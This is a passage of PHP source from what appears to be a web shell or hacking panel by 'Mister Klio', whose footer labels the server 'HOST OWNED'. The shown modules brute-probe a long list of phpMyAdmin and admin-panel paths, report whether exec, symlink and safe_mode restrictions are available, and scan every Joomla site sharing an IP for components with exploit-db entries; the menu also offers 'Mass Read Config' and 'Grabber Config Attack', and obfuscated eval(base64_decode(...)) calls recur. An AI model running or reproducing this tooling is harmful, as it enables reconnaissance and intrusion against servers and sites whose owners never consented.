  2623. </ul></nav></center>";
  2624. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>FIND DATABASE PANELS</span></nav><br><div class=content><center>";
  2625. ?>
  2626. <form action ="" method="post">
  2627. <span style="color:white"><center>URL :</center></span>
  2628. <center><input type="text" name="site" class="input" alt="username" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" style="width:40%"><br><br>
  2629. <input type = "submit" value="FIND" class="Mister-button"></center>
  2630. </form></td>
  2631. <?php
  2632. $site = $_POST['site'];
  2633. $list = array(
  2634. '/phpmyadmin/',
  2635. '/PMA/',
  2636. '/pma/',
  2637. '/admin/',
  2638. '/dbadmin/',
  2639. '/DB_ADMIN/',
  2640. '/db_admin/',
  2641. '/DBA/',
  2642. '/SQLI/',
  2643. '/dba/',
  2644. '/sqli/',
  2645. '/myadmin/',
  2646. '/phpmyadmin2/',
  2647. '/phpMyAdmin2/',
  2648. '/phpMyAdmin-2/',
  2649. '/php-my-admin/',
  2650. '/phpMyAdmin-2.2.3/',
  2651. '/phpMyAdmin-2.2.6/',
  2652. '/phpMyAdmin-2.5.1/',
  2653. '/phpMyAdmin-2.5.4/',
  2654. '/phpMyAdmin-2.5.5-rc1/',
  2655. '/phpMyAdmin-2.5.5-rc2/',
  2656. '/phpMyAdmin-2.5.5/',
  2657. '/phpMyAdmin-2.5.5-pl1/',
  2658. '/phpMyAdmin-2.5.6-rc1/',
  2659. '/phpMyAdmin-2.5.6-rc2/',
  2660. '/phpMyAdmin-2.5.6/',
  2661. '/phpMyAdmin-2.5.7/',
  2662. '/phpMyAdmin-2.5.7-pl1/',
  2663. '/phpMyAdmin-2.6.0-alpha/',
  2664. '/phpMyAdmin-2.6.0-alpha2/',
  2665. '/phpMyAdmin-2.6.0-beta1/',
  2666. '/phpMyAdmin-2.6.0-beta2/',
  2667. '/phpMyAdmin-2.6.0-rc1/',
  2668. '/phpMyAdmin-2.6.0-rc2/',
  2669. '/phpMyAdmin-2.6.0-rc3/',
  2670. '/phpMyAdmin-2.6.0/',
  2671. '/phpMyAdmin-2.6.0-pl1/',
  2672. '/phpMyAdmin-2.6.0-pl2/',
  2673. '/phpMyAdmin-2.6.0-pl3/',
  2674. '/phpMyAdmin-2.6.1-rc1/',
  2675. '/phpMyAdmin-2.6.1-rc2/',
  2676. '/phpMyAdmin-2.6.1/',
  2677. '/phpMyAdmin-2.6.1-pl1/',
  2678. '/phpMyAdmin-2.6.1-pl2/',
  2679. '/phpMyAdmin-2.6.1-pl3/',
  2680. '/phpMyAdmin-2.6.2-rc1/',
  2681. '/phpMyAdmin-2.6.2-beta1/',
  2682. '/phpMyAdmin-2.6.2-rc1/',
  2683. '/phpMyAdmin-2.6.2/',
  2684. '/phpMyAdmin-2.6.2-pl1/',
  2685. '/phpMyAdmin-2.6.3/',
  2686. '/phpMyAdmin-2.6.3-rc1/',
  2687. '/phpMyAdmin-2.6.3/',
  2688. '/phpMyAdmin-2.6.3-pl1/',
  2689. '/phpMyAdmin-2.6.4-rc1/',
  2690. '/phpMyAdmin-2.6.4-pl1/',
  2691. '/phpMyAdmin-2.6.4-pl2/',
  2692. '/phpMyAdmin-2.6.4-pl3/',
  2693. '/phpMyAdmin-2.6.4-pl4/',
  2694. '/phpMyAdmin-2.6.4/',
  2695. '/phpMyAdmin-2.7.0-beta1/',
  2696. '/phpMyAdmin-2.7.0-rc1/',
  2697. '/phpMyAdmin-2.7.0-pl1/',
  2698. '/phpMyAdmin-2.7.0-pl2/',
  2699. '/phpMyAdmin-2.7.0/',
  2700. '/phpMyAdmin-2.8.0-beta1/',
  2701. '/phpMyAdmin-2.8.0-rc1/',
  2702. '/phpMyAdmin-2.8.0-rc2/',
  2703. '/phpMyAdmin-2.8.0/',
  2704. '/phpMyAdmin-2.8.0.1/',
  2705. '/phpMyAdmin-2.8.0.2/',
  2706. '/phpMyAdmin-2.8.0.3/',
  2707. '/phpMyAdmin-2.8.0.4/',
  2708. '/phpMyAdmin-2.8.1-rc1/',
  2709. '/phpMyAdmin-2.8.1/',
  2710. '/phpMyAdmin-2.8.2/',
  2711. '/sqlmanager/',
  2712. '/mysqlmanager/',
  2713. '/p/m/a/',
  2714. '/PMA2005/',
  2715. '/pma2005/',
  2716. '/dev/',
  2717. '/phpmanager/',
  2718. '/php-myadmin/',
  2719. '/phpmy-admin/',
  2720. '/webadmin/',
  2721. '/sqlweb/',
  2722. '/websql/',
  2723. '/webdb/',
  2724. '/mysqladmin/',
  2725. '/mysql-admin/',
  2726. '/mya/',
  2727. '/myadmin/',
  2728. '/mysql/',
  2729. '/sql/',
  2730. '/server/',
  2731. '/db/',
  2732. '/database/',
  2733. '/databases/',
  2734. '/adm/',
  2735. '/configuration/',
  2736. '/configure/',
  2737. '/administrator/',
  2738. '/login/',
  2739. '/moderator/',
  2740. '/controlpanel/',
  2741. '/adminpanel/',
  2742. '/admincontrol/',
  2743. '/fileadmin/',
  2744. '/data/',
  2745. '/postgresql/',
  2746. '/oracle/',
  2747. '/msssql/',
  2748. '/msaccess/',
  2749. '/sysadmin/',
  2750. '/serverdata/',
  2751. '/webadmin/',
  2752. '/admins/',
  2753. '/Database_Administration/',
  2754. '/WebAdmin/',
  2755. '/useradmin/',
  2756. '/sysadmins/',
  2757. '/admin1/',
  2758. '/system-administration/',
  2759. '/administrators/',
  2760. '/pgadmin/',
  2761. '/DIRectadmin/',
  2762. '/staradmin/',
  2763. '/ServerAdministrator/',
  2764. '/SysAdmin/',
  2765. '/administer/',
  2766. '/LiveUser_Admin/',
  2767. '/sys-admin/',
  2768. '/typo3/',
  2769. '/panel/',
  2770. '/xlogin/',
  2771. '/smblogin/',
  2772. '/phpldapadmin/',
  2773. '/server_admin/',
  2774. '/database_administration/',
  2775. '/system_administration/',
  2776. '/ss_vms_admin_sm/',
  2777. '/adminarea/',
  2778. '/MySQL/',
  2779. '/mysql_admin/',
  2780. '/server_data/',
  2781. '/DB/',
  2782. '/DB1/',
  2783. '/DB2/',
  2784. '/DB3/',
  2785. '/DB4/',
  2786. '/DB5/',
  2787. '/DB6/',
  2788. '/DB7/',
  2789. '/DB8/',
  2790. '/DB9/',
  2791. '/DB0/',
  2792. '/db1/',
  2793. '/db2/',
  2794. '/db3/',
  2795. '/db4/',
  2796. '/db5/',
  2797. '/db6/',
  2798. '/db7/',
  2799. '/db8/',
  2800. '/db9/',
  2801. '/db0/',
  2802. '/mysql5/',
  2803. '/mysql4/',
  2804. '/root/',
  2805. '/apache/',
  2806. '/php/',
  2807. '/Apache/',
  2808. '/Php/',
  2809. '/apach/',
  2810. '/apachepanel/',
  2811. '/WEBSERVERS/',
  2812. '/DATABASE1/',
  2813. '/DATABASE2/',
  2814. '/DATABASE3/',
  2815. '/DATABASE4/',
  2816. '/DATABASE5/',
  2817. '/DATABASE6/',
  2818. '/DATABASE7/',
  2819. '/DATABASE8/',
  2820. '/DATABASE9/',
  2821. '/WEBDATA/',
  2822. '/WEB_DATA/',
  2823. '/webservers/',
  2824. '/database1/',
  2825. '/database2/',
  2826. '/database3/',
  2827. '/database4/',
  2828. '/database5/',
  2829. '/database6/',
  2830. '/database7/',
  2831. '/database8/',
  2832. '/database9/',
  2833. '/webdata/',
  2834. '/web_data/',
  2835. );
  2836. if(isset($site)){
  2837. foreach($list as $path => $test) {
  2838. $ch = curl_init();
  2839. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2840. curl_setopt($ch, CURLOPT_HEADER, 1);
  2841. curl_setopt($ch, CURLOPT_URL, $site.$test);
  2842. $result = curl_exec($ch);
  2843. curl_close($ch);
  2844. //print $url;
  2845. if (preg_match("/200 OK/", $result)){
  2846. echo "<br><span style='color:#0000F0'>[+]</span><span style='color:white'> FOUND : </span><span><a>[ <a target=_white style='color:#0000F0'>$site$test </span>]</a></span>";
  2847. }
  2848. else       if (preg_match("/401 Unauthorized/", $result)) {
  2849. echo "<br><span style='color:#0000F0'>[+]</span><span style='color:white'> FOUND : </span><span><a>[ <a target=_white style='color:#0000F0'>$site$test </span>]</a></span>";
  2850. }
  2851. }
  2852. echo "<center><br><span style='font-size:10px;  color:#0000F0'><b>SCAN FINISHED</b></center><br>";}
  2853. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  2854. echo ''. $FOTTER2 .'' ;
  2855. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2856. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2857. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2858. $SERVERIP1 = "SERVER IP :";
  2859. echo ''. $SERVERIP1 .'' ;
  2860. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2861. $SPAN3 = "</span>";
  2862. echo ''. $SPAN2 .'' ;
  2863. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2864. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2865. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2866. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2867. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2868. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  2869. $HOSTOWNED1 = "HOST OWNED :";
  2870. echo ''. $HOSTOWNED1 .'' ;
  2871. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2872. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2873. echo ''. $REPORTERROR .'</a></span></footer>';
  2874. echo ''. $THEEND .'' ;
  2875. exit;}
  2876. //////////// INFOSERV
  2877. if ($_GET['Mister'] == 'infoserv'){
  2878. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>SAFE MODES</span></nav><div class=content>";
  2879. ////////////// SAFE MODES
  2880. if(ini_get('safe_mode') == '1'){
  2881. echo '<span style="color:#FFFFFF;">&check; SAFE MODE : </span><span style=" color:#0000F0"> ON</span><br>';
  2882. }else{
  2883. echo '<span style="color:#FFFFFF;">&check; SAFE MODE : </span><span style=" color:#f60000"> OFF</span><br>';
  2884. }
  2885. if(ini_get('magic_quotes_gpc') == '1'){
  2886. echo '<span style="color:#FFFFFF;">&check; MAGIC_QUOTES_GPC :</span><span style=" color:#0000F0"> ON</span><br>';
  2887. }else{
  2888. echo '<span style="color:#FFFFFF;">&check; MAGIC_QUOTES_GPC :</span><span style=" color:#f60000"> OFF</span><br>';
  2889. }
  2890. if(function_exists('mysql_connect')){
  2891. echo '<span style="color:#FFFFFF;">&check;  MYSQL :</span><span style=" color:#0000F0"> ON</span><br>';
  2892. }else{
  2893. echo '<span style="color:#FFFFFF;">&check;  MYSQL :</span><span style=" color:#f60000"> OFF</span><br>';
  2894. }
  2895. if(function_exists('mssql_connect')){
  2896. echo '<span style="color:#FFFFFF;">&check;  MSSQL:<span style=" color:#0000F0"> ON</span><br>';
  2897. }else{
  2898. echo '<span style="color:#FFFFFF;">&check; MSSQL:<span style=" color:#f60000"> OFF</span><br>';
  2899. }
  2900. if(function_exists('pg_connect')){
  2901. echo '<span style="color:#FFFFFF;">&check; POSTGRESQL:<span style=" color:#0000F0"> ON</span><br>';
  2902. }else{
  2903. echo '<span style="color:#FFFFFF;">&check; POSTGRESQL:<span style=" color:#f60000"> OFF</span><br>';
  2904. }
  2905. if(function_exists('ocilogon')){
  2906. echo '<span style="color:#FFFFFF;">&check; ORACLE: </span><span style=" color:#0000F0"> ON</span><br>';
  2907. }else{
  2908. echo '<span style="color:#FFFFFF;">&check;  ORACLE: </span><span style=" color:#f60000"> OFF</span><br>';
  2909. }
  2910. if(function_exists('curl_version')){
  2911. echo '<span style="color:#FFFFFF;">&check;  CURL:<span style=" color:#0000F0"> ON</span><br>';
  2912. }
  2913. else{
  2914. echo '<span style="color:#FFFFFF;">&check; CURL:</span><span style=" color:#f60000"> OFF</span><br>';
  2915. }
  2916. if(function_exists('exec')){
  2917. echo '<span style="color:#FFFFFF;">&check; EXEC:<span style=" color:#0000F0"> ON</span><br>';
  2918. }
  2919. else{
  2920. echo '<span style="color:#FFFFFF;">&check; EXEC:<span style=" color:#f60000"> OFF</span><br>';
  2921. }
  2922. if(!ini_get('open_baseDIR') != "on"){
  2923. echo '<span style="color:#FFFFFF;">&check; OPEN_BASEDIR:<span style=" color:#f60000"> OFF</span><br>';
  2924. }
  2925. else{
  2926. echo '<span style="color:#FFFFFF;">&check; OPEN_BASEDIR:<span style=" color:#0000F0"> ON</span><br>';
  2927. }
  2928. if(!ini_get('ini_restore') != "on"){
  2929. echo '<span style="color:#FFFFFF;">&check;  INI_RESTORE:<span style=" color:#f60000"> OFF</span><br>';
  2930. }
  2931. else{
  2932. echo '<span style="color:#FFFFFF;">&check; INI_RESTORE:<span style=" color:#0000F0"> ON</span><br>';
  2933. }
  2934. if(function_exists('symlink')){
  2935. echo '<span style="color:#FFFFFF;">&check; SYMLINK:<span style=" color:#0000F0"> ON</span><br>';
  2936. }
  2937. else{
  2938. echo '<span style="color:#FFFFFF;">&check; SYMLINK:<span style=" color:#f60000"> OFF</span><br>';
  2939. }
  2940. if(function_exists('file_get_contents')){
  2941. echo ' <span style="color:#FFFFFF;">&check; FILE_GET_CONTENTS:<span style=" color:#0000F0"> ON</span><br>';
  2942. }
  2943. else{
  2944. echo ' <span style="color:#FFFFFF;">&check; FILE_GET_CONTENTS:<span style=" color:#f60000"> OFF</span><br>';
  2945. }
  2946. if(IS_DIR('sim/rut')){
  2947. echo '<span style="color:#FFFFFF;">&check;  PERMISSION:<span style=" color:#0000F0"> ON</span><br>';
  2948. }
  2949. else{
  2950. echo '<span style="color:#FFFFFF;">&check;  PERMISSION:<span style=" color:red"> OFF</span><br>';
  2951. }
  2952. //////////// INFORMATIONS
  2953. ///// DISABLE FUNCTIONS
  2954. echo "<span style='color:#FFFFFF;'>&check; DISABLE FUNCTIONS : </span>";
  2955. if(''==($df=@ini_get('disable_functions'))){echo "<font color=#0000F0>NON</font> <br> ";}else{echo "<font color=red>$df</font><br>";}
  2956. define('SA_ROOT', str_replace('\\', '/', DIRname(__FILE__)).'/');
  2957. ////////
  2958. function getcfg($varname) {
  2959. $result = get_cfg_var($varname);
  2960. if ($result == 0) {return 'NO';
  2961. } elseif ($result == 1) {return 'YES';
  2962. } else {return $result;}}
  2963. ////
  2964. function p($str){
  2965. echo $str."\n";}
  2966. function formhead($arg = array()) {
  2967. if ($arg['title']) {
  2968. p('<h2>'.$arg['title'].' &raquo;</h2>');}}
  2969. //////
  2970. $upsize=getcfg('file_uploads') ? getcfg('upload_max_FILESIZE') : 'Not allowed';
  2971. !$dis_func && $dis_func = 'NO';
  2972. ///// SERVER
  2973. $info = array(
  2974.         1 => array(' &check; <span style="color:#FFFFFF;">SERVER TIME </span><span style="color:red;"> ',date('Y/m/d h:i:s',$timestamp)),
  2975.        
  2976.         2 => array('&check; <span style="color:#FFFFFF;">SERVER OS </span><span style="color:red;"> ',PHP_OS),
  2977.         3 => array('&check; <span style="color:#FFFFFF;">SERVER OS CHARSET </span><span style="color:red;"> ',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
  2978.         4 => array('&check; <span style="color:#FFFFFF;">PHP RUN MODE </span><span style="color:red;"> ',strtoupper(php_sapi_name())),
  2979. ///// PHP
  2980.         5 => array('&check; <span style="color:#FFFFFF;">PHP VERSION </span><span style="color:red;"> ',PHP_VERSION),
  2981.         6 => array('&check; <span style="color:#FFFFFF;">ADMINISTRATOR </span><span style="color:red;"> ',$adminmail),
  2982.         7 => array('&check; <span style="color:#FFFFFF;">ALLOW_URL_FOPEN </span><span style="color:red;"> ',getcfg('allow_url_fopen')),
  2983.         8 => array('&check; <span style="color:#FFFFFF;">ENABLE_DL </span> <span style="color:red;"> ',getcfg('enable_dl')),
  2984.         9 => array('&check; <span style="color:#FFFFFF;">DISPLAY_ERRORS </span> <span style="color:red;"> ',getcfg('display_errors')),
  2985.         10 => array('&check; <span style="color:#FFFFFF;">REGISTER_GLOBALS </span><span style="color:red;"> ',getcfg('register_globals')),
  2986.         11 => array('&check; <span style="color:#FFFFFF;">MAGIC_QUOTES_GPC </span><span style="color:red;"> ',getcfg('magic_quotes_gpc')),
  2987.         12 => array('&check; <span style="color:#FFFFFF;">MEMORY_LIMIT </span><span style="color:red;"> ',getcfg('memory_limit')),
  2988.         13 => array('&check; <span style="color:#FFFFFF;">POST_MAX_SIZE </span><span style="color:red;"> ',getcfg('post_max_size')),
  2989.         14 => array('&check; <span style="color:#FFFFFF;">UPLOAD_MAX_FILESIZE </span><span style="color:red;"> ',$upsize),);
  2990. if($phpvarname) {
  2991. m($phpvarname .' : '.getcfg($phpvarname));}
  2992. ///// SERVER
  2993. $hp = array(0=> '<span style="color:#FFFFFF;font-size:16px;">INFO SERVER</span>', 1=> '<span style="color:#FFFFFF;font-size:16px;">INFO PHP</span>');
  2994. for($a=0;$a<2;$a++) {
  2995. p('<h2><nav class="Mister-nav">'.$hp[$a].' &raquo;</h2>');
  2996. p('<ul class="info">');
  2997. if ($a==0) {
  2998. for($i=1;$i<=9;$i++) {
  2999. p('<li>'.$info[$i][0].':'.$info[$i][1].'</li>');}
  3000. } elseif
  3001. ($a == 1) {for($i=10;$i<=23;$i++) {
  3002. p('<li>'.$info[$i][0].':</u>'.$info[$i][1].'</li></nav>');}}
  3003. p('</ul>');}
  3004. $FOTTER2 = "<footer class='MK-footer'>";  
  3005. echo ''. $FOTTER2 .'' ;
  3006. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3007. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3008. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3009. $SERVERIP1 = "SERVER IP :";
  3010. echo ''. $SERVERIP1 .'' ;
  3011. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3012. $SPAN3 = "</span>";
  3013. echo ''. $SPAN2 .'' ;
  3014. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3015. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3016. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3017. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3018. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3019. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3020. $HOSTOWNED1 = "HOST OWNED :";
  3021. echo ''. $HOSTOWNED1 .'' ;
  3022. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3023. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3024. echo ''. $REPORTERROR .'</a></span></footer>';
  3025. echo ''. $THEEND .'' ;
  3026. exit;}
  3027. if ($_GET["Mister"] == "J-Scann3r"){
  3028. echo "<br><center><nav class='social'><ul>
  3029. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3030. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3031. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3032. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3033. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3034. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3035. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3036. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3037. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3038. <li><a href='?Mister=whois'>Website Whois</a></li>
  3039. </ul></nav></center>";
  3040. echo '<nav class="Mister-nav"><center><span style="font-size:18px;color:#0000F0">JOOMLA SERV3R SCANN3R V2</span></nav><center><br><div class=content>
  3041. <form method="POST">';
  3042. ?>
  3043. <input type="text" name="site" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" style="width:50%;"><input type="submit" value="SCANN3" class="Mister-button"></p></form>
  3044. <?php
  3045. function check_exploit($Auto_Shearch){
  3046.     $link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Auto_Shearch&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  3047.      
  3048.     $result = @file_get_contents($link);
  3049.      
  3050.     if (eregi("NO RESULTS",$result))  {
  3051.      
  3052.     echo"<td style='width:50%;'>NOT FOUND</td><td><a href='http://www.google.ma/#hl=en&q=download+$Auto_Shearch+joomla+extension'>DOWNLOAD</a></td></tr>";
  3053.      
  3054.     }else{
  3055.      
  3056.     echo"<td style='width:50%;'><a href='$link'>FOUND</a></td><td><=</td></tr>";
  3057.      
  3058.     }
  3059.     }
  3060.      
  3061.     function check_com($url){
  3062.      
  3063.     $source = @file_get_contents($url);
  3064.      
  3065.     preg_match_all('{option,(.*?)/}i',$source,$f);
  3066.     preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  3067.     preg_match_all('{/components/(.*?)/}i',$source,$f3);
  3068.      
  3069.     $arz=array_merge($f2[1],$f[1],$f3[1]);
  3070.      
  3071.     $coms=array();
  3072.      
  3073.     foreach(array_unique($arz) as $x){
  3074.     $coms[]=$x;
  3075.     }
  3076.      
  3077.     foreach($coms as $comm){
  3078.      
  3079.     echo "<tr><td>$comm</td>";
  3080.     check_exploit($comm);
  3081.     }
  3082.      
  3083.     }
  3084.      
  3085.     function sec($site){
  3086.     preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
  3087.     if(eregi("www",$sites[0][0])){
  3088.     return $site=str_replace("index.php","",$sites[0][0]);
  3089.     }else{
  3090.     return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
  3091.     }}
  3092.      
  3093.     $npages = 50000;
  3094.      
  3095.     if ($_POST)
  3096.     {
  3097.       $ip = trim(strip_tags($_POST['site']));
  3098.       $npage = 1;
  3099.       $allLinks = array();
  3100.      
  3101.      
  3102.        while($npage <= $npages)
  3103.       {
  3104.      
  3105.       $x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);
  3106.      
  3107.      
  3108.         if ($x)
  3109.         {
  3110.             preg_match_all('(<div>.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $x, $findlink);
  3111.            
  3112.             foreach ($findlink[1] as $fl)
  3113.            
  3114.             $allLinks[]=sec($fl);
  3115.            
  3116.            
  3117.             $npage = $npage + 10;
  3118.            
  3119.             if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0)
  3120.                 break;              
  3121.         }
  3122.        
  3123.         else
  3124.             break;
  3125.       }
  3126.      
  3127.      
  3128.     $allDmns = array();
  3129.      
  3130.     foreach ($allLinks as $kk => $vv){
  3131.      
  3132.     $allDmns[] = $vv;
  3133.     }
  3134.                
  3135.     echo'<table border="0"  style="width:50%;" >
  3136.    <tr><td width=\"30%\"><b>SERVER IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.$ip.'</b></td></tr>            
  3137.    <tr><td style="width:50%;"><b>SITES FOUND &nbsp; : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
  3138.    </table>';
  3139.     echo "<br><br>";
  3140.      
  3141.     echo'<table border="0" align=\"center\" style="width:50%;">';
  3142.      
  3143.     foreach(array_unique($allDmns) as $h3h3){
  3144.      
  3145.     echo'<tr><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>EXPLOIT-DB</b></td><td><b>CHALLENGE OF EXPLOITING ..!</b></td></tr>';
  3146.      
  3147.     check_com($h3h3);
  3148.      
  3149.     }
  3150.      
  3151.     echo"</table>";
  3152. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  3153. echo ''. $FOTTER2 .'' ;
  3154. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3155. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3156. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3157. $SERVERIP1 = "SERVER IP :";
  3158. echo ''. $SERVERIP1 .'' ;
  3159. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3160. $SPAN3 = "</span>";
  3161. echo ''. $SPAN2 .'' ;
  3162. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3163. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3164. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3165. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3166. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3167. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3168. $HOSTOWNED1 = "HOST OWNED :";
  3169. echo ''. $HOSTOWNED1 .'' ;
  3170. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3171. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3172. echo ''. $REPORTERROR .'</a></span></footer>';
  3173. echo ''. $THEEND .'' ;}
  3174. exit;}
  3175. ////// FINDERADMIN
  3176. if ($_GET['Mister'] == 'FinderAdmin') {
  3177. $FOTTER2 = "<footer class='MK-footer'>";  
  3178. echo ''. $FOTTER2 .'' ;
  3179. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3180. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3181. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3182. $SERVERIP1 = "SERVER IP :";
  3183. echo ''. $SERVERIP1 .'' ;
  3184. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3185. $SPAN3 = "</span>";
  3186. echo ''. $SPAN2 .'' ;
  3187. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3188. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3189. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3190. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3191. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3192. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3193. $HOSTOWNED1 = "HOST OWNED :";
  3194. echo ''. $HOSTOWNED1 .'' ;
  3195. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3196.  
  3197.  
  3198. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3199. echo ''. $REPORTERROR .'</a></span></footer>';
  3200. echo ''. $THEEND .'' ;
  3201. ////// FOOTER
  3202. echo "<br><center><nav class='social'><ul>
  3203. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3204. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3205. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3206. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3207. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3208. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3209. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3210. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3211. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3212. <li><a href='?Mister=whois'>Website Whois</a></li>
  3213. </ul></nav></center>";
  3214. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>FIND ADMINISTRATOR PANEL V1.0</span></nav><br><div class=content><center>";
  3215. ?>
  3216. <form action ="" method="post">
  3217. <span style="color:white"><center>Coded By Mister Klio</center></span>
  3218. <span style="color:white"><center>URL : HTTP://TARGET.COM</center></span><br>
  3219. <center><input type="text" name="site" class="input" alt="username" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" style="width:40%" ><br><br>
  3220. <input type = "submit" value="FIND" class="Mister-button" ></center>
  3221. </form></td>
  3222. <?php
  3223. $site = $_POST['site'];
  3224. $list = array(
  3225. '/administrator/',
  3226. '/administrateur/',
  3227. '/admin/',
